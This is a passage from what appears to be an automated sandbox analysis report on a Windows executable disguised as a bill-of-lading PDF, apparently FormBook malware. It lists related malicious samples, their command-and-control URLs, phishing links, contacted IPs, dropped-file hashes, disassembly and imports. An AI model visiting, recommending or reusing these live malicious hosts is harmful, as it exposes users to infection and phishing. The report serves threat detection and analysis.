                                                                                                                    • www.sleepstudy.clinic/qb3j/?ldz=rxiD0VSh&jB=cFuFzZ3YvTtiHrP9YgB50pNFy1R7naj/7FPBP4W+y4TnGL17Vly9WSpF5ldignjoFUjCQ6N7kk5Em/mIXQaOgZKVJHh7DFNdo3QSNa+0F8GHeDzAsg==
                                                                                                                    zamowienie.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                    • www.3808.app/t4fd/
                                                                                                                    PO1268931024 - Bank Slip.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                    • www.ila.beauty/izfe/
                                                                                                                    Request for 30 Downpayment.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                    • www.discountprice.shop/dmec/
                                                                                                                    request-BPp -RFQ 0975432.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                    • www.3808.app/4do9/
                                                                                                                    NOXGUARD AUS 40 UREA__912001_NOR_EN - MSDS.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • www.3808.app/4do9/
                                                                                                                    PR. No.1599-Rev.2.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • www.moneta.life/qzre/
                                                                                                                    lByv6mqTCJ.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.comedy.finance/mwd0/
                                                                                                                    3wgZ0nlbTe.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.invicta.world/0cd8/
                                                                                                                    65.21.196.90P1 BOL.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • www.030002107.xyz/fnq1/
                                                                                                                    Doc 784-01965670.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.030002837.xyz/y045/
                                                                                                                    TT Swift copy1.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.030002832.xyz/o2wj/
                                                                                                                    BL.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.030002837.xyz/y045/
                                                                                                                    rDRAWINGDWGSINC.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.030002832.xyz/k59q/
                                                                                                                    DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.030002787.xyz/jd21/?4h=5kdLJS6M41di2+SNW7K1XcXipX6NQkkN8kSgJbF3gr0dFVoGwgZsF4aW2rsxuxwIowbH&pPQ=OJEtxf4
                                                                                                                    jeez.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.030002803.xyz/bw0u/
                                                                                                                    quote894590895pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.030002832.xyz/k59q/
                                                                                                                    AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.030002252.xyz/2ncs/
                                                                                                                    NU1aAbSmCr.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.030002304.xyz/6uay/

                                                                                                                    Domains

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    www.ly0.xyzAL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 172.67.220.57
                                                                                                                    www.numbox.liveAL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 63.250.47.57
                                                                                                                    www.heeraka.infoAL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 75.2.103.23
                                                                                                                    www.awesomearv.buzzAL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 161.97.168.245
                                                                                                                    huayang.302.gn301.xyzAL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 172.247.44.157
                                                                                                                    PO#001498.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 107.148.177.200
                                                                                                                    Electronic Order.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 154.222.238.52
                                                                                                                    Inquiry PR#27957.bat.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 154.12.34.252

                                                                                                                    ASNs

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    CP-ASDEarm.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 65.21.50.224
                                                                                                                    P1 BOL.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 65.21.196.90
                                                                                                                    Doc 784-01965670.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 65.21.196.90
                                                                                                                    TT Swift copy1.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 65.21.196.90
                                                                                                                    BL.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 65.21.196.90
                                                                                                                    rDRAWINGDWGSINC.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 65.21.196.90
                                                                                                                    https://eadzhost.net/quieter/QUOTE_TECNO_GAZ_INDUSTRIES_63787_MC.rarGet hashmaliciousFormBookBrowse
                                                                                                                    • 65.21.29.43
                                                                                                                    na.htaGet hashmaliciousCobalt Strike, FormBook, GuLoaderBrowse
                                                                                                                    • 65.21.196.90
                                                                                                                    DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 65.21.196.90
                                                                                                                    jeez.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 65.21.196.90
                                                                                                                    AMAZON-02UShttps://linkednnn.weebly.com/Get hashmaliciousUnknownBrowse
                                                                                                                    • 13.33.219.205
                                                                                                                    https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                                    • 18.245.31.33
                                                                                                                    https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                                    • 18.245.31.33
                                                                                                                    la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 54.74.40.186
                                                                                                                    la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 3.119.248.154
                                                                                                                    la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 44.255.24.135
                                                                                                                    la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 54.75.206.147
                                                                                                                    https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                                    • 18.245.31.5
                                                                                                                    la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 3.172.96.239
                                                                                                                    https://www.ccleaner.com/Get hashmaliciousUnknownBrowse
                                                                                                                    • 13.224.189.110
                                                                                                                    AMAZON-02UShttps://linkednnn.weebly.com/Get hashmaliciousUnknownBrowse
                                                                                                                    • 13.33.219.205
                                                                                                                    https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                                    • 18.245.31.33
                                                                                                                    https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                                    • 18.245.31.33
                                                                                                                    la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 54.74.40.186
                                                                                                                    la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 3.119.248.154
                                                                                                                    la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 44.255.24.135
                                                                                                                    la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 54.75.206.147
                                                                                                                    https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                                    • 18.245.31.5
                                                                                                                    la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 3.172.96.239
                                                                                                                    https://www.ccleaner.com/Get hashmaliciousUnknownBrowse
                                                                                                                    • 13.224.189.110
                                                                                                                    WEBINDUSTRIEFRAL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 91.212.26.5
                                                                                                                    http://soudhydro.fr/Get hashmaliciousUnknownBrowse
                                                                                                                    • 91.212.26.75
                                                                                                                    q4tYxpZQys.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 185.90.96.69
                                                                                                                    8u0ERReXCRGet hashmaliciousUnknownBrowse
                                                                                                                    • 185.90.96.89
                                                                                                                    http://webmail13.hosteam.frGet hashmaliciousOutlook Phishing HTMLPhisherBrowse
                                                                                                                    • 91.229.231.28
                                                                                                                    jew.arm7Get hashmaliciousMiraiBrowse
                                                                                                                    • 185.90.96.91
                                                                                                                    94VG.armGet hashmaliciousUnknownBrowse
                                                                                                                    • 185.90.96.30
                                                                                                                    6YDlqbb66nGet hashmaliciousUnknownBrowse
                                                                                                                    • 185.90.96.94

                                                                                                                    JA3 Fingerprints

                                                                                                                    No context

                                                                                                                    Dropped Files

                                                                                                                    No context

                                                                                                                    Created / dropped Files

                                                                                                                    C:\Users\user\AppData\Local\Temp\Um65m294

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\write.exe
                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):114688
                                                                                                                    Entropy (8bit):0.9746603542602881
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                    Malicious:false
                                                                                                                    Reputation:high, very likely benign file
                                                                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Users\user\AppData\Local\Temp\slashing

                                                                                                                    Download File
                                                                                                                    Process:C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):288256
                                                                                                                    Entropy (8bit):7.994903670155084
                                                                                                                    Encrypted:true
                                                                                                                    SSDEEP:6144:oJw2y6fqUCmy48kV7ogOxoq4v9DLLwhqrHPkqSQPznSAaQrxAgp/Ps:oJw/689kV7JJq41DfwIHPvPzMQrx/Ps
                                                                                                                    MD5:32C4A005796C1328754BB8682BEA8FAB
                                                                                                                    SHA1:370F9AD77344606F36DAE8123AAB7C49B477B9BB
                                                                                                                    SHA-256:3FFDB826ADECD2C23EB57265A0EBF086A1B16E43917301C67BF0E6A3CF585C7A
                                                                                                                    SHA-512:A08380BEF3EF67C342EBE3820E3D04300324E789747ED127E618161DB7030129D43696E43EC9A8F0D596F2F98D1E971870204121F9AD83AE24C69AEFE06B8497
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:...`.SNUF..D.....L6..dNJ...CC24SNUFIFGMYGL29YL5GKXLMBKJYC.24S@J.GF.D.f.3u.ma/"+l=0$-+"..W2 ;)=f%(y59\.0"....l -//wNN8.SNUFIFG4XN..Y>..',.q-%.P...T4.O..{->.V...pU ..%.*v*>.C24SNUFI..MY.M39.*I.KXLMBKJY.C05XO^FI.CMYGL29YL5w_XLMRKJY3G24S.UFYFGM[GL49YL5GKXJMBKJYCC2DWNUDIFGMYGN2y.L5WKX\MBKJICC"4SNUFIVGMYGL29YL5GKXLMBKJYCC24SNUFIFGMYGL29YL5GKXLMBKJYCC24SNUFIFGMYGL29YL5GKXLMBKJYCC24SNUFIFGMYGL29YL5GKXLMBKJYCC24SNUFIFGMYGL29YL5GKXLMl?/!7C24..QFIVGMY.H29IL5GKXLMBKJYCC2.SN5FIFGMYGL29YL5GKXLMBKJYCC24SNUFIFGMYGL29YL5GKXLMBKJYCC24SNUFIFGMYGL29YL5GKXLMBKJYCC24SNUFIFGMYGL29YL5GKXLMBKJYCC24SNUFIFGMYGL29YL5GKXLMBKJYCC24SNUFIFGMYGL29YL5GKXLMBKJYCC24SNUFIFGMYGL29YL5GKXLMBKJYCC24SNUFIFGMYGL29YL5GKXLMBKJYCC24SNUFIFGMYGL29YL5GKXLMBKJYCC24SNUFIFGMYGL29YL5GKXLMBKJYCC24SNUFIFGMYGL29YL5GKXLMBKJYCC24SNUFIFGMYGL29YL5GKXLMBKJYCC24SNUFIFGMYGL29YL5GKXLMBKJYCC24SNUFIFGMYGL29YL5GKXLMBKJYCC24SNUFIFGMYGL29YL5GKXLMBKJYCC24SNUFIFGMYGL29YL5GKXLMBKJYCC24SNUFIFGMYGL29YL5GKXLMBKJYCC24SNUFIFGMYGL29YL5GKXLMBKJYCC24SNUFIFGMY

                                                                                                                    Static File Info

                                                                                                                    General

                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Entropy (8bit):7.511608858394749
                                                                                                                    TrID:
                                                                                                                    • Win32 Executable (generic) a (10002005/4) 95.11%
                                                                                                                    • AutoIt3 compiled script executable (510682/80) 4.86%
                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                    File name:Bill Of Lading_MEDUVB935991.pdf.exe
                                                                                                                    File size:1'326'841 bytes
                                                                                                                    MD5:0b14ab0ac2f8e44d3f3cfd8fcdbe6d30
                                                                                                                    SHA1:15d07797ac7d44d65eb44b00fcaa3c5decd840da
                                                                                                                    SHA256:fee2d4f0f34f90653abf9827d99da2fc9670fb10e83dbf008cd447ca86e5c418
                                                                                                                    SHA512:37f3a88d61c11aa28a50eef23ff25608a30655fd1e417122bbf78f33f9ad82d97b1ba833e40774a18a3a6094b316571e0018bd6157b4da3c1c6ad0353c347bb7
                                                                                                                    SSDEEP:24576:ffmMv6Ckr7Mny5QLZHBYbvqe0MD4z630Xh6BZfQCJWqL3yvMqf:f3v+7/5QLZhYbJiXh6vfXrMf
                                                                                                                    TLSH:6F55F112B7D680B6DDA339B1293BE327AB35B5194333C4CBA7E02F769E111405B3A761
                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i...i...i.....9.k...`.:.w...`.,.....`.+.P...N%..c...N%..H...i...d...`. ./...w.:.k...w.;.h...i.8.h...`.>.h...Richi..........

                                                                                                                    File Icon

                                                                                                                    Icon Hash:1733312925935517

                                                                                                                    Static PE Info

                                                                                                                    General

                                                                                                                    Entrypoint:0x416310
                                                                                                                    Entrypoint Section:.text
                                                                                                                    Digitally signed:false
                                                                                                                    Imagebase:0x400000
                                                                                                                    Subsystem:windows gui
                                                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                    Time Stamp:0x4B93CF87 [Sun Mar 7 16:08:39 2010 UTC]
                                                                                                                    TLS Callbacks:
                                                                                                                    CLR (.Net) Version:
                                                                                                                    OS Version Major:5
                                                                                                                    OS Version Minor:0
                                                                                                                    File Version Major:5
                                                                                                                    File Version Minor:0
                                                                                                                    Subsystem Version Major:5
                                                                                                                    Subsystem Version Minor:0
                                                                                                                    Import Hash:aaaa8913c89c8aa4a5d93f06853894da

                                                                                                                    Entrypoint Preview

                                                                                                                    Instruction
                                                                                                                    call 00007F89ECEAA2DCh
                                                                                                                    jmp 00007F89ECE9E0AEh
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    push ebp
                                                                                                                    mov ebp, esp
                                                                                                                    push edi
                                                                                                                    push esi
                                                                                                                    mov esi, dword ptr [ebp+0Ch]
                                                                                                                    mov ecx, dword ptr [ebp+10h]
                                                                                                                    mov edi, dword ptr [ebp+08h]
                                                                                                                    mov eax, ecx
                                                                                                                    mov edx, ecx
                                                                                                                    add eax, esi
                                                                                                                    cmp edi, esi
                                                                                                                    jbe 00007F89ECE9E23Ah
                                                                                                                    cmp edi, eax
                                                                                                                    jc 00007F89ECE9E3DAh
                                                                                                                    cmp ecx, 00000100h
                                                                                                                    jc 00007F89ECE9E251h
                                                                                                                    cmp dword ptr [004A94E0h], 00000000h
                                                                                                                    je 00007F89ECE9E248h
                                                                                                                    push edi
                                                                                                                    push esi
                                                                                                                    and edi, 0Fh
                                                                                                                    and esi, 0Fh
                                                                                                                    cmp edi, esi
                                                                                                                    pop esi
                                                                                                                    pop edi
                                                                                                                    jne 00007F89ECE9E23Ah
                                                                                                                    pop esi
                                                                                                                    pop edi
                                                                                                                    pop ebp
                                                                                                                    jmp 00007F89ECE9E69Ah
                                                                                                                    test edi, 00000003h
                                                                                                                    jne 00007F89ECE9E247h
                                                                                                                    shr ecx, 02h
                                                                                                                    and edx, 03h
                                                                                                                    cmp ecx, 08h
                                                                                                                    jc 00007F89ECE9E25Ch
                                                                                                                    rep movsd
                                                                                                                    jmp dword ptr [00416494h+edx*4]
                                                                                                                    nop
                                                                                                                    mov eax, edi
                                                                                                                    mov edx, 00000003h
                                                                                                                    sub ecx, 04h
                                                                                                                    jc 00007F89ECE9E23Eh
                                                                                                                    and eax, 03h
                                                                                                                    add ecx, eax
                                                                                                                    jmp dword ptr [004163A8h+eax*4]
                                                                                                                    jmp dword ptr [004164A4h+ecx*4]
                                                                                                                    nop
                                                                                                                    jmp dword ptr [00416428h+ecx*4]
                                                                                                                    nop
                                                                                                                    mov eax, E4004163h
                                                                                                                    arpl word ptr [ecx+00h], ax
                                                                                                                    or byte ptr [ecx+eax*2+00h], ah
                                                                                                                    and edx, ecx
                                                                                                                    mov al, byte ptr [esi]
                                                                                                                    mov byte ptr [edi], al
                                                                                                                    mov al, byte ptr [esi+01h]
                                                                                                                    mov byte ptr [edi+01h], al
                                                                                                                    mov al, byte ptr [esi+02h]
                                                                                                                    shr ecx, 02h
                                                                                                                    mov byte ptr [edi+02h], al
                                                                                                                    add esi, 03h
                                                                                                                    add edi, 03h
                                                                                                                    cmp ecx, 08h
                                                                                                                    jc 00007F89ECE9E1FEh

                                                                                                                    Rich Headers

                                                                                                                    Programming Language:
                                                                                                                    • [ASM] VS2008 SP1 build 30729
                                                                                                                    • [ C ] VS2008 SP1 build 30729
                                                                                                                    • [C++] VS2008 SP1 build 30729
                                                                                                                    • [ C ] VS2005 build 50727
                                                                                                                    • [IMP] VS2005 build 50727
                                                                                                                    • [ASM] VS2008 build 21022
                                                                                                                    • [RES] VS2008 build 21022
                                                                                                                    • [LNK] VS2008 SP1 build 30729

                                                                                                                    Data Directories

                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x8cd3c0x154.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9298.rsrc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x820000x840.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                    Sections

                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                    .text0x10000x800170x802006c20c6bf686768b6f134f5bd508171bcFalse0.5602991615853659data6.634688230255595IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                    .rdata0x820000xd95c0xda00f979966509a93083729d23cdfd2a6f2dFalse0.36256450688073394data4.880040824124099IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                    .data0x900000x1a5180x6800e5d77411f751d28c6eee48a743606795False0.1600060096153846data2.2017649896261107IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                    .rsrc0xab0000x92980x9400f6be76de0ef2c68f397158bf01bdef3eFalse0.4896801097972973data5.530303089784181IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                    Resources

                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                    RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                    RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                    RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                    RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                                                                                    RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                                                                                    RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                                                                                    RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                                                                                    RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                                                                                    RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                                                                                    RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                                                                                    RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                                                                                    RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                                                                                    RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                                                                                    RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                                                                                    RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                                                                                    RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                                                                                    RT_STRING0xb28380x43adataEnglishGreat Britain0.3733826247689464
                                                                                                                    RT_STRING0xb2c780x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                    RT_STRING0xb32780x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                    RT_STRING0xb38d80x388dataEnglishGreat Britain0.377212389380531
                                                                                                                    RT_STRING0xb3c600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                                                                    RT_GROUP_ICON0xb3db80x84dataEnglishGreat Britain0.6439393939393939
                                                                                                                    RT_GROUP_ICON0xb3e400x14dataEnglishGreat Britain1.15
                                                                                                                    RT_GROUP_ICON0xb3e580x14dataEnglishGreat Britain1.25
                                                                                                                    RT_GROUP_ICON0xb3e700x14dataEnglishGreat Britain1.25
                                                                                                                    RT_VERSION0xb3e880x19cdataEnglishGreat Britain0.5339805825242718
                                                                                                                    RT_MANIFEST0xb40280x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                                                                                                    Imports

                                                                                                                    DLLImport
                                                                                                                    WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                                                                    VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                                                                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                    COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                                                                    MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                                                                    WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                                                                    PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                                                                    USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                                                                    KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, MultiByteToWideChar, WideCharToMultiByte, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, lstrcmpiW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, GetProcessHeap, OutputDebugStringW, GetLocalTime, CompareStringW, CompareStringA, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetComputerNameW, GetWindowsDirectoryW, GetSystemDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ResumeThread, GetStartupInfoW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleFileNameA, HeapReAlloc, HeapCreate, SetHandleCount, GetFileType, GetStartupInfoA, SetStdHandle, GetConsoleCP, 